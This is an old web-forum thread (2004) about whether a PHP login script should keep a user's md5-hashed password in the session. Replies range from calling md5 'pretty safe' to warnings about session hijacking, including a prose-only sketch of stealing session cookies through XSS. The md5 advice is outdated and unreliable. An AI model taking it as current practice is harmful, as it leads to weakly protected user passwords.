Page 1 of 1
Should you store password in session?
Posted: Sun Nov 21, 2004 11:48 pm
by bradles
Hi All,
Is it a bad idea to store a users md5 password in a session? Can we get by without it being in there?
Sorry...i'm fairly new to writing a login script.
Brad.
Posted: Mon Nov 22, 2004 3:25 am
by rehfeld
its not that bad. it really depends how safe you need to be. if its md5'ed its pretty safe though. you weak points are likely in other places.
but it would probably be better to just use something like
Code: Select all
if (submitted username and password are correct) {
$_SESSION['logged_in'] = true;
}
// then just check on subsequent pages
if (empty($_SESSION['logged_in'])) {
echo 'not logged in';
} else {
// ok
}
Posted: Mon Nov 22, 2004 6:36 am
by bradles
Thanks rehfeld. Much appreciated.
Posted: Mon Nov 22, 2004 6:43 am
by John Cartwright
bradles wrote:Thanks rehfeld. Much appreciated.
To answer your question I would recommend you do not. Md5 hashes can be broken, and sessions can be hijacked. If someone REALLY wanted to with a bit a research it could be accomplished.
Posted: Mon Nov 22, 2004 7:46 am
by Maugrim_The_Reaper
As above - password in session is risky. It's low risk, but it's there all the same.
I'd be far more worried about having a user's session hijacked. This is entirely possible using XSS (cross site scripting). You can look it up in more detail by googling, but it boils down to ensuring users cannot employ javascript, etc. in any text they submit - for example setting something simple like a MSN contact detail to point to a js file using script tags which steals some user cookie details - like sessid...
Something to think about...
Posted: Mon Nov 22, 2004 7:47 am
by John Cartwright
Maugrim_The_Reaper wrote:As above - password in session is risky. It's low risk, but it's there all the same.
I'd be far more worried about having a user's session hijacked. This is entirely possible using XSS (cross site scripting). You can look it up in more detail by googling, but it boils down to ensuring users cannot employ javascript, etc. in any text they submit - for example setting something simple like a MSN contact detail to point to a js file using script tags which steals some user cookie details - like sessid...
Something to think about...
hehe, nice idea lol
Posted: Mon Nov 22, 2004 10:18 am
by Maugrim_The_Reaper
It's not so funny when it happens to you...

I've seen it in action on a test case.